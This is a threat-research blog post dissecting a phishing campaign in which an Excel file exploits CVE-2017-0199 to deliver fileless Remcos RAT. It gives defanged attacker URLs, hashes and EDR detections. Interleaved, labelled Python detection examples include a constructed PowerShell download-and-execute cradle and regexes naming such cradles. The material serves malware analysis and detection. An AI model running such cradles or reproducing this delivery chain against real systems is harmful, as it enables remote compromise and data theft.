URL: https://www.trellix.com/blogs/research/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-...
UNMASKING THE HIDDEN THREAT: INSIDE A SOPHISTICATED EXCEL-BASED ATTACK
DELIVERING FILELESS REMCOS RAT

By Trishaan Kalra · September 11, 2024


INTRODUCTION

In the rapidly evolving landscape of cybersecurity, attackers are continuously
refining their methods to bypass detection and deliver malicious payloads. This
blog dissects a recent advanced malware campaign built around a seemingly
benign Excel file, delivered via phishing, that exploits CVE-2017-0199, a
critical vulnerability in Microsoft Office and WordPad that allows attackers to
execute arbitrary code when a user opens a specially crafted document. The
vulnerability lies in the handling of Object Linking and Embedding (OLE)
objects, enabling an attacker to embed malicious code within a file that appears
benign. This sophisticated campaign uses encrypted Microsoft Office documents,
OLE objects, and multiple layers of obfuscated scripts to execute a fileless
variant of the Remcos Remote Access Trojan (RAT) on the victim's system. We will
explore each stage of the attack chain and provide actionable insights for
cybersecurity professionals.


MALWARE CAMPAIGN OVERVIEW

The malware campaign being analyzed demonstrates the increasing complexity of
modern cyber threats. The attack begins with a phishing email containing an
encrypted Excel file that exploits CVE-2017-0199. Upon opening the file, OLE
objects are used to trigger the download and execution of a malicious HTA
application. This HTA application subsequently launches a chain of PowerShell
commands that culminate in the injection of a fileless Remcos RAT into a
legitimate Windows process. This RAT establishes persistence on the system,
allowing the attacker to maintain control and exfiltrate data.

Since the discovery of CVE-2017-0199, the cybersecurity landscape has witnessed
a range of similar malware campaigns delivering threats such as LATENTBOT,
FINSPY, and WingBird/FinFisher. More recently, in 2024, new campaigns following
a comparable kill-chain have emerged, deploying malware like RevengeRAT,
SnakeKeylogger, GuLoader, AgentTesla, and FormBook across the globe,
particularly targeting the Government, Manufacturing, Technology/IT, and Banking
sectors. This delivery mechanism is predominantly active in Belgium, Japan, the
United States, South Korea, Canada, Germany, and Australia (Fig. 1). These
ongoing campaigns underscore the persistent and evolving danger posed by this
vulnerability, highlighting its critical role in enabling sophisticated
cyberattacks.

Figure 1: Geographical heatmap visualizing the use of similar attack chains
globally


DETAILED ANALYSIS


DELIVERY MECHANISM

The malware campaign begins with a threat actor emailing a Microsoft Office
document to a targeted user, with an OLE2 link object embedded within it. To
gain initial access, the attacker employs a deceptive, encrypted Excel document
(Fig. 2a) that exploits CVE-2017-0199. The file appears innocuous, featuring a
pixelated screenshot intended to give the impression that the content is
protected, enticing the victim to interact with it (Fig. 2b). This subtle
manipulation convinces the victim to engage with the document, unknowingly
triggering the execution of the embedded OLE objects.

 * MITRE ATT&CK Techniques
   * T1566.001 (Phishing: Spearphishing Attachment)
   * T1204.002 (User Execution: Malicious File)

Figure 2a: oletools confirming that the Excel file is encrypted
Figure 2b: Excel document containing pixelated screenshot


WEAPONIZATION

OLE embedded objects are a known method for delivering malicious payloads, as
they can be hidden within seemingly harmless documents. The file analyzed here,
which exploits CVE-2017-0199, is an OLE-embedded document that contains a
malicious URL (hxxps[:]//slug[.]vercel[.]app/wyiqkf) within an OLE object (Fig.
3). Once the embedded OLE object is executed, it establishes an outbound
connection to a malicious URL (hxxp[:]//45.90.89.50/xampp/ien/INET.hta),
initiating the download and execution of a weaponized HTA file.

 * MITRE ATT&CK Techniques
   * T1203 (Exploitation for Client Execution)
   * T1221 (Template Injection)

Figure 3: Embedded OLE object containing malicious URL


EXPLOITATION

Upon execution, the URL-encoded HTA application (Fig. 4) runs PowerShell,
passing it multiple base64-encoded parameters (Fig. 5) that decode into a
command to download and execute a VBScript from the malicious URL
(hxxp[:]//45[.]90[.]89[.]50/100/instantflowercaseneedbeautygirlsherealways.gIF)
contained in them (Fig. 6). This execution is made possible by the Excel file's
exploitation of CVE-2017-0199, which enables the delivery of the malicious HTA
application.

Figure 4: URL-encoded HTA application
Figure 5: base64-encoded parameters passed to execute PowerShell
Figure 6: Decoded parameters passed to PowerShell for execution
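Reconstructing what Figures 5 and 6 show, an analyst decodes the base64 handed to PowerShell layer by layer until plain script remains. The Python below is an added example, not code from the post or from Trellix: it peels nested base64 layers (UTF-16LE for -EncodedCommand, UTF-8 for FromBase64String) out of a command line and tags the download-and-execute indicators the write-up describes. The command line, URL and file name it works on are constructed for the example.

```python
import base64
import binascii
import re

# Constructed sample, not the campaign's real command line: a UTF-16LE base64 blob
# for -EncodedCommand that unwraps a second base64 layer which downloads and runs a
# script. The IP is from the TEST-NET-2 documentation range.
LAYER2 = ("IEX (New-Object Net.WebClient).DownloadString("
          "'http://198.51.100.23/stage/update.gIF')")
LAYER1 = ("IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(LAYER2.encode()).decode() + "')))")
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -Enc "
                  + base64.b64encode(LAYER1.encode("utf-16-le")).decode())

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
INDICATORS = {  # pattern -> label, using the ATT&CK IDs the write-up assigns
    r"\bIEX\b|Invoke-Expression": "T1059.001 Invoke-Expression",
    r"DownloadString|DownloadFile|Net\.WebClient": "T1105 download cradle",
    r"FromBase64String": "T1140 inline base64 decode",
    r"Reflection\.Assembly": "T1620 reflective assembly load",
    r"-W(indowStyle)?\s+Hidden": "hidden window",
}

def decode_blob(blob):
    """Decode a base64 run as UTF-16LE (-EncodedCommand) or UTF-8 (FromBase64String);
    only printable ASCII results are accepted, which rejects random-looking runs."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return None

def peel(text, depth=0, layers=None, hits=None):
    """Recursively decode base64 layers; returns (layers outermost-first, indicator labels hit)."""
    layers, hits = [] if layers is None else layers, set() if hits is None else hits
    hits.update(label for pat, label in INDICATORS.items() if re.search(pat, text, re.IGNORECASE))
    if depth < 5:  # depth cap guards against pathological nesting
        for m in B64_RUN.finditer(text):
            decoded = decode_blob(m.group())
            if decoded:
                layers.append(decoded)
                peel(decoded, depth + 1, layers, hits)
    return layers, hits
```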


The executed program initially appears to be a harmless utility VBScript
intended for configuring secure sessions in a networked environment (Fig. 7).
However, a deeper inspection uncovers a block of obfuscated data within the
script (Fig. 8). Upon execution of the VBScript, the discovered obfuscated data
is processed by PowerShell (Fig. 9), revealing its true purpose. This clever
obfuscation and delayed execution strategy is designed to evade detection,
allowing the malicious payload to be deployed stealthily in the target
environment.

Figure 7: VBScript appearing as benign utility script
Figure 8: Block of obfuscated data present in executed VBScript
Figure 9: Obfuscated data getting executed by PowerShell


Analyzing the memory space allocated to the PowerShell process executing the
obfuscated data reveals that it initiates another PowerShell process to further
the attack (Fig. 10). This behavior is confirmed by inspecting the child
processes spawned by the initial process (Fig. 11). This chaining of PowerShell
commands and the creation of new processes exemplify the sophisticated and
layered approach used by the malware to evade detection while maintaining
persistence and advancing its malicious objectives.

Figure 10: Obfuscated data getting executed by PowerShell
Figure 11: PowerShell process spawning another PowerShell process to escalate
the attack


The newly spawned PowerShell process executes with multiple parameters (Fig.
12), initially downloading a JPEG file (Fig. 13) from a malicious URL
(hxxp[:]//servidorwindows[.]ddns[.]com[.]br/Files/vbs.jpeg) controlled by the
attacker.

 * MITRE ATT&CK Techniques
   * T1059.001 (Command and Scripting Interpreter: PowerShell)
   * T1059.001 (Command and Scripting Interpreter: Visual Basic)
   * T1140 (Deobfuscate/Decode Files or Information)

Figure 12: Parameters passed to newly spawned PowerShell process
Figure 13: Downloaded JPEG file


INSTALLATION

The downloaded JPEG file has been manipulated to embed a base64-encoded
‘dnlib.dll’ (Fig. 14), an open-source .NET library used for reading, writing,
and creating .NET assemblies and modules. The encoded ‘dnlib.dll’ is then
decoded and loaded directly into memory via ‘System.Reflection.Assembly’, a .NET
class that allows dynamic loading, inspection, and execution of assemblies at
runtime.

 * MITRE ATT&CK Techniques
   * T1127 (Trusted Developer Utilities)
   * T1105 (Ingress Tool Transfer)
   * T1027.003 (Obfuscated Files or Information: Steganography)
   * T1072 (Software Deployment Tools)

Figure 14: Base64-encoded ‘dnlib.dll’ present in downloaded JPEG file
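Because the downloaded image carries a base64-encoded PE (‘dnlib.dll’) rather than only picture data, a triage check can look for exactly that pattern. The Python below is an added example, not code from the post or from Trellix: it builds a constructed JPEG with a fake PE appended after the End-Of-Image marker, then reports trailing bytes and any base64 run anywhere in the file that decodes to an MZ/PE image.

```python
import base64
import binascii
import re
import struct

# Constructed sample, not the campaign's vbs.jpeg: a minimal JPEG (SOI .. EOI)
# with the base64 of a fake PE image appended after the End-Of-Image marker.
def fake_pe():
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> where "PE\0\0" sits
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr) + b"\x00" * 64

JPEG_STUB = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             b"\xff\xd9")
SAMPLE = JPEG_STUB + base64.b64encode(fake_pe())
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

def is_pe(raw):
    """True if raw starts with an MZ stub whose e_lfanew points at a PE signature."""
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", raw, 0x3C)
    return raw[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def scan_image(data):
    """Flag a JPEG carrying a base64-encoded PE (the T1027.003 pattern in the write-up).
    Reports bytes after the EOI marker and the first base64 run that decodes to a PE."""
    report = {"is_jpeg": data[:2] == b"\xff\xd8", "trailing_bytes": 0,
              "embedded_pe": False, "pe_size": 0}
    eoi = data.rfind(b"\xff\xd9")  # appended base64 is ASCII, so rfind lands on the real EOI
    if eoi >= 0:
        report["trailing_bytes"] = len(data) - (eoi + 2)
    for m in B64_RUN.finditer(data):  # scan the whole file, not just the tail
        try:
            raw = base64.b64decode(m.group(), validate=True)
        except binascii.Error:
            continue
        if is_pe(raw):
            report.update(embedded_pe=True, pe_size=len(raw))
            break
    return report
```

A clean JPEG yields zero trailing bytes and no PE; a real dnlib.dll would additionally carry a CLR header, which this check does not inspect.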


EXECUTION

PowerShell subsequently downloads a text file containing base64-encoded data
(Fig. 15) from a malicious URL and feeds it to the previously loaded
‘dnlib.dll’ to generate a .NET assembly in memory. This assembly is a variant of
Remcos RAT, which is then injected into the legitimate Windows process ‘RegAsm’
(Fig. 16) for execution.

Figure 15: Base64-encoded text file being used by ‘dnlib.dll’ to create a .NET
assembly of Remcos RAT
Figure 16: Strings related to Remcos found in RegAsm process memory

Upon inspecting the filesystem changes made by ‘RegAsm’, Remcos-associated
behavior and indicators are observed. These indicators confirm the presence of
Remcos RAT on the test system (Figs. 17 & 18).

 * MITRE ATT&CK Techniques
   * T1055.001 (Process Injection: Dynamic-link Library Injection)
   * T1027 (Obfuscated Files or Information)

Figure 17: IOCs associated with Remcos RAT
Figure 18: Remcos RAT keylogger file
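The process tree this section describes (Excel to mshta.exe to PowerShell to a second PowerShell, with RegAsm as the injection host) can be hunted for with parent-child lineage rules over process-creation telemetry. The Python below is an added example, not Trellix's detection logic, run over constructed events; it assumes RegAsm.exe appears as a child of the second PowerShell, which the write-up does not state explicitly, and the 500-character command-line threshold is an assumed value.

```python
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed process-creation telemetry, not the write-up's sandbox data. It mirrors
# the chain described above: Excel -> mshta.exe -> powershell.exe -> powershell.exe,
# plus RegAsm.exe under that lineage as the injection host, and one benign PowerShell.
EVENTS = [
    Proc(1000, 800, "explorer.exe", "explorer.exe"),
    Proc(1200, 1000, "EXCEL.EXE", '"EXCEL.EXE" C:\\Users\\user\\Downloads\\quote.xls'),
    Proc(1300, 1200, "mshta.exe", "mshta.exe http://198.51.100.23/stage.hta"),
    Proc(1400, 1300, "powershell.exe", "powershell.exe -NoP -W Hidden -Enc " + "A" * 600),
    Proc(1500, 1400, "powershell.exe", "powershell.exe -NoP -W Hidden -C " + "B" * 900),
    Proc(1600, 1500, "RegAsm.exe", "RegAsm.exe"),
    Proc(2000, 1000, "powershell.exe", "powershell.exe Get-Process"),  # benign admin use
]
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
LONG_CMDLINE = 500  # threshold for "very long command line", an assumed value

def lineage(index, pid):
    """Lower-cased image names of a process's ancestors, closest parent first."""
    chain, seen, cur = [], {pid}, index.get(pid)
    while cur and cur.ppid in index and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = index[cur.ppid]
        chain.append(cur.image.lower())
    return chain

def detect(events):
    """Return (pid, finding) pairs for the parent-child relationships in this chain."""
    index = {e.pid: e for e in events}
    findings = []
    for e in events:
        img, parents = e.image.lower(), lineage(index, e.pid)
        parent = parents[0] if parents else ""
        if img == "mshta.exe" and parent in OFFICE:
            findings.append((e.pid, "Office application launched mshta.exe (T1218.005)"))
        if img == "powershell.exe" and parent == "mshta.exe":
            findings.append((e.pid, "mshta.exe started PowerShell (T1218.005, T1059.001)"))
        if img == "powershell.exe" and parent == "powershell.exe" and len(e.cmdline) > LONG_CMDLINE:
            findings.append((e.pid, "PowerShell spawned PowerShell with very long command line (T1059.001)"))
        if img == "regasm.exe" and "powershell.exe" in parents:
            findings.append((e.pid, "RegAsm.exe under a PowerShell lineage: possible injection host (T1055.001)"))
    return findings
```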


PERSISTENCE AND DEFENSE EVASION

The Remcos RAT establishes persistence by injecting itself into legitimate
processes, effectively evading traditional security defenses and ensuring
continuous attacker access.

 * MITRE ATT&CK Techniques
   * T1543.003 (Create or Modify System Process: Windows Service)
   * T1071.001 (Application Layer Protocol: Web Protocols)


CONCLUSION

This campaign illustrates the evolving sophistication of modern malware attacks.
By leveraging vulnerabilities like CVE-2017-0199 alongside advanced fileless
techniques, OLE objects, and memory-only .NET assemblies, the attackers have
crafted a highly evasive and persistent threat. By understanding these
techniques and the corresponding attack chain, cybersecurity professionals can
develop more effective defense mechanisms against such advanced threats.


INDICATORS OF COMPROMISE






HASHES

e522d386b90054af950c456a9c108fd9 (SWT20240506_12082.xls)
accdfe7a24bcb621a1dade4ab39eddb2 (f681e8f26091a2a5ed40f477340a06140bbee4fa91eb5fe5a71b40da43affb46.hta)
62069dcfee1598a0df9d8caed54566f7 (vbs.jpeg)
42e59390d88ec14ab5a14873cce70344 (instantflowercaseneedbeautygirlsherealways[1].gz)
b45300468d82291d84ff009c8974c3f2 (JNN.txt)
b135d5a0f51ad3be647c1878a8cc5309 (Remcos)


TRELLIX ENS DETECTIONS

Hash (MD5)                         Detection Name
e522d386b90054af950c456a9c108fd9   XLS/Agent.a
accdfe7a24bcb621a1dade4ab39eddb2   HTA/Agent.g
62069dcfee1598a0df9d8caed54566f7   Generic agent.z
42e59390d88ec14ab5a14873cce70344   VBS/Agent.lr
b45300468d82291d84ff009c8974c3f2   OBFUSCATED/Trojan.c
b135d5a0f51ad3be647c1878a8cc5309   Remcos-FDQO!B135D5A0F51A (Detected w/ current DATs)


TRELLIX EDR DETECTIONS

 1. MD5: 42e59390d88ec14ab5a14873cce70344
    (instantflowercaseneedbeautygirlsherealways[1].gz)

Description | Tactic | TID
VBScript/JavaScript interpreter started suspicious PowerShell process | ['Execution'] | ['T1059.005']
Downloaded content using PowerShell with suspicious command | ['Execution', 'CommandAndControl'] | ['T1059.001', 'T1105', 'T1071']
Download content from third-party website with PowerShell | ['Execution', 'CommandAndControl'] | ['T1059.001', 'T1105', 'T1071']
Invoked methods from .Net Assemblies via PowerShell and Reflection API | ['Execution', 'DefenseEvasion'] | ['T1059.001', 'T1620']
Detected suspicious binary doing system discovery | ['Execution', 'Discovery'] | ['T1106', 'T1082']
Suspicious process accessed desktop.ini file | ['Persistence', 'PrivilegeEscalation'] | ['T1547.009']
Executed PowerShell with very long command line | ['Execution'] | ['T1059.001']

 2. MD5: accdfe7a24bcb621a1dade4ab39eddb2
    (f681e8f26091a2a5ed40f477340a06140bbee4fa91eb5fe5a71b40da43affb46.hta)

Description | Tactic | TID
System Language Discovery via API | ['Execution', 'Discovery'] | ['T1106', 'T1614.001']
Downloaded script file from third-party website through PowerShell | ['Execution', 'CommandAndControl'] | ['T1059.001', 'T1105', 'T1071']
Executed Obfuscated PowerShell Base64String command | ['Execution', 'DefenseEvasion'] | ['T1059.001', 'T1027', 'T1140']
Discovered user information using PowerShell environment variables | ['Discovery', 'Execution'] | ['T1033', 'T1059.001', 'T1087.001', 'T1083']
Executed Windows-native binary mshta.exe | ['DefenseEvasion'] | ['T1218.005']
Windows-native binary mshta.exe has executed an admin tool | ['DefenseEvasion'] | ['T1218.005']
Executed an HTML Application (HTA) file stored in system | ['DefenseEvasion'] | ['T1218.005']
MSHTA acting as VBScript interpreter | ['DefenseEvasion', 'Execution'] | ['T1218.005', 'T1059.005']
Executed Invoke-Expression (IEX) PowerShell cmdlet | ['Execution'] | ['T1059.001']

Blogs | Research

UNVEILING A STEALTHY EXCEL ATTACK DELIVERING FILELESS REMCOS RAT

By Trishaan Kalra · September 11, 2024

This blog analyzes a recent malware campaign using a benign-looking Excel file
in a phishing attack, exploiting CVE-2017-0199 to run code in Microsoft Office
and WordPad.
